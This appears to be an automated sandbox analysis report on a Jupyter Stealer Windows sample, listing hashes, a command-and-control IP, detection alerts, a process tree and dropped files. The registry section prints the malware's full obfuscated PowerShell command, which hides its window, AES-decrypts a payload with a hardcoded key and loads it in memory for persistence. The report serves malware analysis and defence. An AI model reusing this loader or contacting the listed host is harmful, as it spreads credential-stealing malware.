Analysis
-
max time kernel
307s -
max time network
311s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
13-06-2022 00:01
Static task
static1
General
-
Target
1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe
-
Size
209.7MB
-
MD5
b565d27f58b8510377a192dd5a920033
-
SHA1
5db24c39dffeed0ca8b302892c850f13fb981ca5
-
SHA256
1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff
-
SHA512
9494bdfea2f3c3a97ff0407097aff1e7c602811a2b4929ea10d0229fa5e3371fffd80a9876077ab88841e3be125b1c5ebd26c41ad570a6ea50b4c4e4883a9231
Malware Config
Extracted
jupyter
http://37.120.247.120
Signatures
-
suricata: ET MALWARE Jupyter Stealer CnC Checkin
suricata: ET MALWARE Jupyter Stealer CnC Checkin
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1016 powershell.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AAkseLakVWShCAFBIqeAz.lnk powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 204 3728 WerFault.exe 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe -
Modifies registry class 7 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil\ = "jplfkwrqxarlkfumjaublhevlrnzqaj" powershell.exe Key created \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj powershell.exe Key created \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SuzlSBEybt+4l4GorDHHnbdEjW5soZLDzFJs4SVeMJ0=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\SuMZpQaKehWXVEkKQuHyLIZz\\ybWylzucNKVPS.rhyCuOqCZmgcLvgvIl'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[F26y7_MVUpgqQtmoaaDj.RJt6RD8GBp9hWlC5Gbu11nR9257QVV1qfUfdMGc0QJhbcaHbl95wlIt0RvEZQXgar4zx]::UupaQTjrkgVL7jhlnNjwwOfoiDFmEk6eD5fN96jMuScriboS9_bVDY8MwON3Lmr_VqfUsde9ih0S5aB1amydC9k();\"" powershell.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepid process 1016 powershell.exe 1016 powershell.exe 1016 powershell.exe 1016 powershell.exe 1016 powershell.exe 1016 powershell.exe 3984 powershell.exe 3984 powershell.exe 3984 powershell.exe 1016 powershell.exe 1016 powershell.exe 1016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1016 powershell.exe Token: SeDebugPrivilege 3984 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exepowershell.execsc.exedescription pid process target process PID 3728 wrote to memory of 1016 3728 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe powershell.exe PID 3728 wrote to memory of 1016 3728 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe powershell.exe PID 1016 wrote to memory of 3776 1016 powershell.exe csc.exe PID 1016 wrote to memory of 3776 1016 powershell.exe csc.exe PID 3776 wrote to memory of 160 3776 csc.exe cvtres.exe PID 3776 wrote to memory of 160 3776 csc.exe cvtres.exe PID 3728 wrote to memory of 3984 3728 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe powershell.exe PID 3728 wrote to memory of 3984 3728 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe"C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell"2⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD12.tmp" "c:\Users\Admin\AppData\Local\Temp\ep0525dx\CSC170DC3D0F86249CCA0BE8FEC46F733E.TMP"4⤵PID:160
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3728 -s 9362⤵
- Program crash
PID:204
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD52143b379fed61ab5450bab1a751798ce
SHA132f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA5120bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa
-
Filesize
1KB
MD50b2c9f1a68309a879e2fa3eb0ed42191
SHA1f108a9b65bd91d95551f1bbd5cde2d2596364a05
SHA2566cf0e222a3be64aa34fe63baffa1ffba4e0818d2e74a83f74f9d4c7d8030ace3
SHA51269bcb1327f20abf5b8f198fb84a8e9627953e1f2ad95e2ea765b503e54f4630557f14fc851a5b9d65d163e0db91b4770165025a780e4e850c049b2d584c27b45
-
Filesize
3KB
MD533d01500a8b7aae1f1f9bf7bb0a84ff1
SHA15ba1575702f2540b0bbf45355ce1c58baf8d2199
SHA256b3f5bd1696f11e4409f0c8686b3ef5c66fe58008b9267052cec1563329c29db1
SHA5123f475092c3aa0e776a6532eae919a4205347670bff95d73e5c6960d32009a35e885fb719531ae973c443b200b704608102a0c65f6a372f7e10d9430089ebbca4
-
Filesize
652B
MD5f75144a068d98ca775e45b05a7609d9f
SHA15af5a7eb16553a66f6013362b439b52be4a80b5a
SHA2560399de1e3b7746572693e6f2161e8a31e14608b29304240cf0b967b94b3b45de
SHA5129562092f6ee4185d154192424d63bc2a5675f458ce48dd3042075aa85a1af1ea6ab0397a0720ccbeb49516029ec07b7e5d0b0d02ed434fe0dc63928f52f25bda
-
Filesize
236B
MD52f9b4948ac0b26204994e246094a9f5d
SHA19870e53ad61eba593a2074d2a30202f7e3df09f7
SHA256def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776
SHA512ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1
-
Filesize
369B
MD599bcd1c19fb29827fb47c00f2f10c264
SHA193d6c983b6938564a00519eab58da5fa72dc13f4
SHA2568e23f2c03d3ab8f70e1b9c083bfd749219e2327a67efb3c0edd5f15f10df12e9
SHA512afdf1f6c0c711d6dcabb35e00c579e83a696fa25c538e07342ba3fb2deb84680e80e1f43ace3f6b6ed1b38694ed85040777c36a673fc1d22c9762fe0a45867cf